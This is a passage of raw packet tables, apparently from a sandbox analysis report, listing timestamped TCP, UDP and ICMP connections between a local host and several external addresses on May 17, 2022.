                                                                                                                                                                                        May 17, 2022 13:32:08.375428915 CEST50086443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:32:08.375447989 CEST44350086142.250.186.46192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:32:08.423691034 CEST44350086142.250.186.46192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:32:08.423789024 CEST50086443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:32:08.432970047 CEST50086443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:32:08.432995081 CEST44350086142.250.186.46192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:32:08.437273979 CEST50086443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:32:08.437294006 CEST44350086142.250.186.46192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:32:08.504260063 CEST44350085142.250.186.46192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:32:08.504307985 CEST44350085142.250.186.46192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:32:08.504321098 CEST50085443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:32:08.504338980 CEST44350085142.250.186.46192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:32:08.504347086 CEST50085443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:32:08.504379034 CEST50085443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:32:08.504384041 CEST44350085142.250.186.46192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:32:08.504420042 CEST50085443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:32:08.507935047 CEST44350085142.250.186.46192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:32:08.507994890 CEST44350085142.250.186.46192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:32:08.508019924 CEST50085443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:32:08.508028030 CEST50085443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:32:08.508450985 CEST50085443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:32:08.508465052 CEST44350085142.250.186.46192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:32:08.509948969 CEST50087443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:32:08.509983063 CEST44350087142.250.186.46192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:32:08.510051966 CEST50087443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:32:08.510941029 CEST50087443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:32:08.510967016 CEST44350087142.250.186.46192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:32:08.560298920 CEST44350087142.250.186.46192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:32:08.560400009 CEST50087443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:32:08.562212944 CEST50087443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:32:08.562227011 CEST44350087142.250.186.46192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:32:08.567576885 CEST50087443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:32:08.567603111 CEST44350087142.250.186.46192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:32:08.683468103 CEST44350086142.250.186.46192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:32:08.683548927 CEST44350086142.250.186.46192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:32:08.683571100 CEST50086443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:32:08.683619022 CEST44350086142.250.186.46192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:32:08.683645010 CEST50086443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:32:08.683677912 CEST50086443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:32:08.683690071 CEST44350086142.250.186.46192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:32:08.683748007 CEST50086443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:32:08.687096119 CEST44350086142.250.186.46192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:32:08.687180042 CEST50086443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:32:08.687199116 CEST44350086142.250.186.46192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:32:08.687231064 CEST44350086142.250.186.46192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:32:08.687264919 CEST50086443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:32:08.687279940 CEST50086443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:32:08.690310955 CEST50086443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:32:08.690349102 CEST44350086142.250.186.46192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:32:08.690361977 CEST50086443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:32:08.690414906 CEST50086443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:32:08.691745043 CEST50088443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:32:08.691811085 CEST44350088142.250.186.46192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:32:08.691888094 CEST50088443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:32:08.692387104 CEST50088443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:32:08.692414045 CEST44350088142.250.186.46192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:32:08.738847971 CEST44350087142.250.186.46192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:32:08.738955021 CEST50087443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:32:08.738991022 CEST44350087142.250.186.46192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:32:08.739056110 CEST50087443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:32:08.739078045 CEST44350087142.250.186.46192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:32:08.739135981 CEST50087443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:32:08.739151001 CEST44350087142.250.186.46192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:32:08.739198923 CEST50087443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:32:08.739329100 CEST44350088142.250.186.46192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:32:08.739413023 CEST50088443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:32:08.741879940 CEST44350087142.250.186.46192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:32:08.741956949 CEST50087443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:32:08.741977930 CEST44350087142.250.186.46192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:32:08.742002010 CEST44350087142.250.186.46192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:32:08.742023945 CEST50087443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:32:08.742049932 CEST50087443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:32:08.749696016 CEST50087443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:32:08.749732018 CEST44350087142.250.186.46192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:32:08.750139952 CEST50088443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:32:08.750155926 CEST44350088142.250.186.46192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:32:08.751918077 CEST50089443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:32:08.751976967 CEST44350089142.250.186.46192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:32:08.752068043 CEST50089443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:32:08.752630949 CEST50089443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:32:08.752665997 CEST44350089142.250.186.46192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:32:08.755930901 CEST50088443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:32:08.755950928 CEST44350088142.250.186.46192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:32:08.804235935 CEST44350089142.250.186.46192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:32:08.804311991 CEST50089443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:32:08.804812908 CEST50089443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:32:08.804827929 CEST44350089142.250.186.46192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:32:08.808465004 CEST50089443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:32:08.808505058 CEST44350089142.250.186.46192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:32:08.913654089 CEST44350088142.250.186.46192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:32:08.913714886 CEST44350088142.250.186.46192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:32:08.913732052 CEST50088443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:32:08.913764954 CEST44350088142.250.186.46192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:32:08.913953066 CEST50088443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:32:08.913965940 CEST50088443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:32:08.916317940 CEST44350088142.250.186.46192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:32:08.916405916 CEST44350088142.250.186.46192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:32:08.916425943 CEST50088443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:32:08.916457891 CEST50088443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:32:08.916518927 CEST50088443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:32:08.916553020 CEST44350088142.250.186.46192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:32:08.916568041 CEST50088443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:32:08.916631937 CEST50088443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:32:08.920788050 CEST50090443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:32:08.920840979 CEST44350090142.250.186.46192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:32:08.920924902 CEST50090443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:32:08.922638893 CEST50090443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:32:08.922665119 CEST44350090142.250.186.46192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:32:08.967578888 CEST44350090142.250.186.46192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:32:08.967655897 CEST50090443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:32:08.968667984 CEST50090443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:32:08.968678951 CEST44350090142.250.186.46192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:32:08.972325087 CEST50090443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:32:08.972341061 CEST44350090142.250.186.46192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:32:09.040648937 CEST44350089142.250.186.46192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:32:09.040713072 CEST44350089142.250.186.46192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:32:09.040739059 CEST50089443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:32:09.040765047 CEST44350089142.250.186.46192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:32:09.040783882 CEST50089443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:32:09.040824890 CEST50089443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:32:09.041079998 CEST44350089142.250.186.46192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:32:09.041140079 CEST50089443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:32:09.041143894 CEST44350089142.250.186.46192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:32:09.041202068 CEST50089443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:32:09.140218973 CEST44350090142.250.186.46192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:32:09.140283108 CEST50090443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:32:09.140288115 CEST44350090142.250.186.46192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:32:09.140304089 CEST44350090142.250.186.46192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:32:09.140338898 CEST50090443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:32:09.140374899 CEST50090443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:32:09.140382051 CEST44350090142.250.186.46192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:32:09.140433073 CEST50090443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:32:09.140542984 CEST44350090142.250.186.46192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:32:09.140609026 CEST44350090142.250.186.46192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:32:09.140613079 CEST50090443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:32:09.141134977 CEST50090443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:32:12.529377937 CEST5004280192.168.2.3180.163.251.230
                                                                                                                                                                                        May 17, 2022 13:32:14.794977903 CEST5009180192.168.2.3180.163.251.230
                                                                                                                                                                                        May 17, 2022 13:32:17.936142921 CEST5009180192.168.2.3180.163.251.230
                                                                                                                                                                                        May 17, 2022 13:32:23.936652899 CEST5009180192.168.2.3180.163.251.230
                                                                                                                                                                                        May 17, 2022 13:32:24.581034899 CEST5009280192.168.2.3171.8.167.90
                                                                                                                                                                                        May 17, 2022 13:32:25.854262114 CEST5009380192.168.2.3111.13.65.25
                                                                                                                                                                                        May 17, 2022 13:32:25.855885029 CEST5009480192.168.2.3111.13.65.20
                                                                                                                                                                                        May 17, 2022 13:32:25.857108116 CEST5009580192.168.2.3111.13.65.27
                                                                                                                                                                                        May 17, 2022 13:32:26.064594984 CEST5009680192.168.2.3111.13.65.20
                                                                                                                                                                                        May 17, 2022 13:32:26.065459013 CEST5009780192.168.2.3111.13.65.27
                                                                                                                                                                                        May 17, 2022 13:32:27.593183041 CEST5009280192.168.2.3171.8.167.90
                                                                                                                                                                                        May 17, 2022 13:32:28.858998060 CEST5009580192.168.2.3111.13.65.27
                                                                                                                                                                                        May 17, 2022 13:32:28.859004974 CEST5009480192.168.2.3111.13.65.20
                                                                                                                                                                                        May 17, 2022 13:32:28.859010935 CEST5009380192.168.2.3111.13.65.25
                                                                                                                                                                                        May 17, 2022 13:32:29.062247038 CEST5009680192.168.2.3111.13.65.20
                                                                                                                                                                                        May 17, 2022 13:32:29.077714920 CEST5009780192.168.2.3111.13.65.27
                                                                                                                                                                                        May 17, 2022 13:32:33.593770027 CEST5009280192.168.2.3171.8.167.90
                                                                                                                                                                                        May 17, 2022 13:32:34.705960035 CEST5009880192.168.2.3111.13.65.25
                                                                                                                                                                                        May 17, 2022 13:32:34.707410097 CEST5009980192.168.2.3111.13.65.25
                                                                                                                                                                                        May 17, 2022 13:32:34.708283901 CEST5010080192.168.2.3111.13.65.25
                                                                                                                                                                                        May 17, 2022 13:32:34.709152937 CEST5010180192.168.2.3111.13.65.25
                                                                                                                                                                                        May 17, 2022 13:32:34.710001945 CEST5010280192.168.2.3111.13.65.25
                                                                                                                                                                                        May 17, 2022 13:32:35.946062088 CEST5010380192.168.2.3171.8.167.90
                                                                                                                                                                                        May 17, 2022 13:32:37.719140053 CEST5009880192.168.2.3111.13.65.25
                                                                                                                                                                                        May 17, 2022 13:32:37.719173908 CEST5010080192.168.2.3111.13.65.25
                                                                                                                                                                                        May 17, 2022 13:32:37.720412970 CEST5009980192.168.2.3111.13.65.25
                                                                                                                                                                                        May 17, 2022 13:32:37.720431089 CEST5010280192.168.2.3111.13.65.25
                                                                                                                                                                                        May 17, 2022 13:32:37.720453024 CEST5010180192.168.2.3111.13.65.25
                                                                                                                                                                                        May 17, 2022 13:32:38.953572989 CEST5010380192.168.2.3171.8.167.90
                                                                                                                                                                                        May 17, 2022 13:32:41.768277884 CEST5010480192.168.2.3111.13.65.27
                                                                                                                                                                                        May 17, 2022 13:32:41.769279003 CEST5010580192.168.2.3111.13.65.27
                                                                                                                                                                                        May 17, 2022 13:32:41.770459890 CEST5010680192.168.2.3111.13.65.27
                                                                                                                                                                                        May 17, 2022 13:32:41.771708012 CEST5010780192.168.2.3111.13.65.27
                                                                                                                                                                                        May 17, 2022 13:32:41.772849083 CEST5010880192.168.2.3111.13.65.20
                                                                                                                                                                                        May 17, 2022 13:32:44.782135963 CEST5010480192.168.2.3111.13.65.27
                                                                                                                                                                                        May 17, 2022 13:32:44.782150984 CEST5010780192.168.2.3111.13.65.27
                                                                                                                                                                                        May 17, 2022 13:32:44.782185078 CEST5010580192.168.2.3111.13.65.27
                                                                                                                                                                                        May 17, 2022 13:32:44.782193899 CEST5010680192.168.2.3111.13.65.27
                                                                                                                                                                                        May 17, 2022 13:32:44.782562971 CEST5010880192.168.2.3111.13.65.20
                                                                                                                                                                                        May 17, 2022 13:32:44.969634056 CEST5010380192.168.2.3171.8.167.90
                                                                                                                                                                                        May 17, 2022 13:32:45.600841999 CEST5010980192.168.2.3180.97.63.237
                                                                                                                                                                                        May 17, 2022 13:32:48.610683918 CEST5010980192.168.2.3180.97.63.237
                                                                                                                                                                                        May 17, 2022 13:32:50.782728910 CEST5010580192.168.2.3111.13.65.27
                                                                                                                                                                                        May 17, 2022 13:32:50.785187960 CEST5010680192.168.2.3111.13.65.27
                                                                                                                                                                                        May 17, 2022 13:32:50.785187960 CEST5010880192.168.2.3111.13.65.20
                                                                                                                                                                                        May 17, 2022 13:32:50.785414934 CEST5010480192.168.2.3111.13.65.27
                                                                                                                                                                                        May 17, 2022 13:32:50.785419941 CEST5010780192.168.2.3111.13.65.27
                                                                                                                                                                                        May 17, 2022 13:32:52.363012075 CEST5011680192.168.2.3111.13.65.25
                                                                                                                                                                                        May 17, 2022 13:32:52.471931934 CEST5011780192.168.2.3111.13.65.25
                                                                                                                                                                                        May 17, 2022 13:32:52.473957062 CEST5011880192.168.2.3111.13.65.25
                                                                                                                                                                                        May 17, 2022 13:32:52.475003958 CEST5011980192.168.2.3111.13.65.25
                                                                                                                                                                                        May 17, 2022 13:32:52.475989103 CEST5012080192.168.2.3111.13.65.25
                                                                                                                                                                                        May 17, 2022 13:32:53.081378937 CEST50089443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:32:53.091280937 CEST50090443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:32:53.091325045 CEST44350090142.250.186.46192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:32:53.098891020 CEST50121443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:32:53.098938942 CEST44350121142.250.186.46192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:32:53.099045038 CEST50121443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:32:54.689379930 CEST5010980192.168.2.3180.97.63.237
                                                                                                                                                                                        May 17, 2022 13:32:57.087241888 CEST5012480192.168.2.3180.97.63.237
                                                                                                                                                                                        May 17, 2022 13:33:00.095948935 CEST5012480192.168.2.3180.97.63.237
                                                                                                                                                                                        May 17, 2022 13:33:06.112114906 CEST5012480192.168.2.3180.97.63.237
                                                                                                                                                                                        May 17, 2022 13:33:06.796945095 CEST5013180192.168.2.3171.13.14.66
                                                                                                                                                                                        May 17, 2022 13:33:09.178497076 CEST4973580192.168.2.369.42.215.252
                                                                                                                                                                                        May 17, 2022 13:33:09.181740999 CEST50121443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:33:09.799904108 CEST5013180192.168.2.3171.13.14.66
                                                                                                                                                                                        May 17, 2022 13:33:15.894179106 CEST5013180192.168.2.3171.13.14.66

                                                                                                                                                                                        UDP Packets

                                                                                                                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                        May 17, 2022 13:31:21.130645037 CEST5641753192.168.2.38.8.8.8
                                                                                                                                                                                        May 17, 2022 13:31:21.310791969 CEST53564178.8.8.8192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:31:22.881264925 CEST5592353192.168.2.38.8.8.8
                                                                                                                                                                                        May 17, 2022 13:31:23.008301020 CEST5811653192.168.2.38.8.8.8
                                                                                                                                                                                        May 17, 2022 13:31:23.026559114 CEST5742153192.168.2.38.8.8.8
                                                                                                                                                                                        May 17, 2022 13:31:23.194958925 CEST53559238.8.8.8192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:31:23.211891890 CEST213893478192.168.2.31.192.136.170
                                                                                                                                                                                        May 17, 2022 13:31:23.211990118 CEST213903478192.168.2.31.192.136.170
                                                                                                                                                                                        May 17, 2022 13:31:23.211999893 CEST213903478192.168.2.31.192.136.170
                                                                                                                                                                                        May 17, 2022 13:31:23.214494944 CEST213893478192.168.2.31.192.136.170
                                                                                                                                                                                        May 17, 2022 13:31:23.214571953 CEST213903478192.168.2.31.192.136.170
                                                                                                                                                                                        May 17, 2022 13:31:23.214636087 CEST213903478192.168.2.31.192.136.170
                                                                                                                                                                                        May 17, 2022 13:31:23.345601082 CEST53574218.8.8.8192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:31:23.431988955 CEST213893478192.168.2.31.192.136.170
                                                                                                                                                                                        May 17, 2022 13:31:23.432095051 CEST213903478192.168.2.31.192.136.170
                                                                                                                                                                                        May 17, 2022 13:31:23.432198048 CEST213903478192.168.2.31.192.136.170
                                                                                                                                                                                        May 17, 2022 13:31:23.470870018 CEST53581168.8.8.8192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:31:23.505098104 CEST1000380192.168.2.3180.163.230.245
                                                                                                                                                                                        May 17, 2022 13:31:23.539249897 CEST6535853192.168.2.38.8.8.8
                                                                                                                                                                                        May 17, 2022 13:31:23.566926956 CEST53653588.8.8.8192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:31:23.650563955 CEST213893478192.168.2.31.192.136.170
                                                                                                                                                                                        May 17, 2022 13:31:23.650619030 CEST213903478192.168.2.31.192.136.170
                                                                                                                                                                                        May 17, 2022 13:31:23.650660038 CEST213903478192.168.2.31.192.136.170
                                                                                                                                                                                        May 17, 2022 13:31:23.923077106 CEST213893478192.168.2.31.192.136.170
                                                                                                                                                                                        May 17, 2022 13:31:23.923135042 CEST213903478192.168.2.31.192.136.170
                                                                                                                                                                                        May 17, 2022 13:31:23.923198938 CEST213903478192.168.2.31.192.136.170
                                                                                                                                                                                        May 17, 2022 13:31:24.207609892 CEST213893478192.168.2.31.192.136.170
                                                                                                                                                                                        May 17, 2022 13:31:24.207663059 CEST213903478192.168.2.31.192.136.170
                                                                                                                                                                                        May 17, 2022 13:31:24.207724094 CEST213903478192.168.2.31.192.136.170
                                                                                                                                                                                        May 17, 2022 13:31:24.421911001 CEST213893478192.168.2.31.192.136.170
                                                                                                                                                                                        May 17, 2022 13:31:24.421967030 CEST213903478192.168.2.31.192.136.170
                                                                                                                                                                                        May 17, 2022 13:31:24.422017097 CEST213903478192.168.2.31.192.136.170
                                                                                                                                                                                        May 17, 2022 13:31:26.034451008 CEST4987353192.168.2.38.8.8.8
                                                                                                                                                                                        May 17, 2022 13:31:26.052664995 CEST53498738.8.8.8192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:31:27.530282974 CEST1000380192.168.2.3180.163.230.245
                                                                                                                                                                                        May 17, 2022 13:31:28.656028032 CEST5380253192.168.2.38.8.8.8
                                                                                                                                                                                        May 17, 2022 13:31:28.675216913 CEST53538028.8.8.8192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:31:31.815556049 CEST6333253192.168.2.38.8.8.8
                                                                                                                                                                                        May 17, 2022 13:31:31.834594011 CEST53633328.8.8.8192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:31:33.059660912 CEST6354853192.168.2.38.8.8.8
                                                                                                                                                                                        May 17, 2022 13:31:33.078521013 CEST53635488.8.8.8192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:31:35.509466887 CEST5139153192.168.2.38.8.8.8
                                                                                                                                                                                        May 17, 2022 13:31:35.528561115 CEST53513918.8.8.8192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:31:35.573436022 CEST1000380192.168.2.3180.163.230.245
                                                                                                                                                                                        May 17, 2022 13:31:36.731329918 CEST5898153192.168.2.38.8.8.8
                                                                                                                                                                                        May 17, 2022 13:31:36.748384953 CEST53589818.8.8.8192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:31:39.107177973 CEST6138053192.168.2.38.8.8.8
                                                                                                                                                                                        May 17, 2022 13:31:39.124074936 CEST53613808.8.8.8192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:31:40.281155109 CEST6314653192.168.2.38.8.8.8
                                                                                                                                                                                        May 17, 2022 13:31:40.299922943 CEST53631468.8.8.8192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:31:42.629704952 CEST5862553192.168.2.38.8.8.8
                                                                                                                                                                                        May 17, 2022 13:31:42.649905920 CEST53586258.8.8.8192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:31:44.291758060 CEST5281053192.168.2.38.8.8.8
                                                                                                                                                                                        May 17, 2022 13:31:44.309257030 CEST53528108.8.8.8192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:31:46.667797089 CEST5515153192.168.2.38.8.8.8
                                                                                                                                                                                        May 17, 2022 13:31:46.686369896 CEST53551518.8.8.8192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:31:47.986789942 CEST5979553192.168.2.38.8.8.8
                                                                                                                                                                                        May 17, 2022 13:31:48.005572081 CEST53597958.8.8.8192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:31:50.386435986 CEST6481653192.168.2.38.8.8.8
                                                                                                                                                                                        May 17, 2022 13:31:50.405781031 CEST53648168.8.8.8192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:31:51.571439981 CEST5381653192.168.2.38.8.8.8
                                                                                                                                                                                        May 17, 2022 13:31:51.588901997 CEST53538168.8.8.8192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:31:51.655153990 CEST1000380192.168.2.3180.163.230.245
                                                                                                                                                                                        May 17, 2022 13:31:53.897166014 CEST6064053192.168.2.38.8.8.8
                                                                                                                                                                                        May 17, 2022 13:31:53.914927006 CEST53606408.8.8.8192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:31:55.064049006 CEST4984453192.168.2.38.8.8.8
                                                                                                                                                                                        May 17, 2022 13:31:55.083386898 CEST53498448.8.8.8192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:31:57.397142887 CEST5151853192.168.2.38.8.8.8
                                                                                                                                                                                        May 17, 2022 13:31:57.422528028 CEST53515188.8.8.8192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:31:58.585808992 CEST4972353192.168.2.38.8.8.8
                                                                                                                                                                                        May 17, 2022 13:31:58.609818935 CEST53497238.8.8.8192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:32:00.945209026 CEST5663953192.168.2.38.8.8.8
                                                                                                                                                                                        May 17, 2022 13:32:00.964720011 CEST53566398.8.8.8192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:32:02.129443884 CEST5045053192.168.2.38.8.8.8
                                                                                                                                                                                        May 17, 2022 13:32:02.146461964 CEST53504508.8.8.8192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:32:04.537597895 CEST6494153192.168.2.38.8.8.8
                                                                                                                                                                                        May 17, 2022 13:32:04.556405067 CEST53649418.8.8.8192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:32:05.728209972 CEST5540353192.168.2.38.8.8.8
                                                                                                                                                                                        May 17, 2022 13:32:05.747066021 CEST53554038.8.8.8192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:32:08.118043900 CEST6187753192.168.2.38.8.8.8
                                                                                                                                                                                        May 17, 2022 13:32:08.137310028 CEST53618778.8.8.8192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:32:23.702544928 CEST1000380192.168.2.3180.163.230.245
                                                                                                                                                                                        May 17, 2022 13:32:24.205642939 CEST6462453192.168.2.38.8.8.8
                                                                                                                                                                                        May 17, 2022 13:32:24.207762957 CEST6441253192.168.2.38.8.8.8
                                                                                                                                                                                        May 17, 2022 13:32:24.520462990 CEST53646248.8.8.8192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:32:25.204087973 CEST6441253192.168.2.38.8.8.8
                                                                                                                                                                                        May 17, 2022 13:32:25.848829985 CEST53644128.8.8.8192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:32:25.983365059 CEST53644128.8.8.8192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:33:14.566956043 CEST1000380192.168.2.3180.163.230.245

                                                                                                                                                                                        ICMP Packets

                                                                                                                                                                                        TimestampSource IPDest IPChecksumCodeType
                                                                                                                                                                                        May 17, 2022 13:32:25.983637094 CEST192.168.2.38.8.8.8d065(Port unreachable)Destination Unreachable

                                                                                                                                                                                        DNS Queries

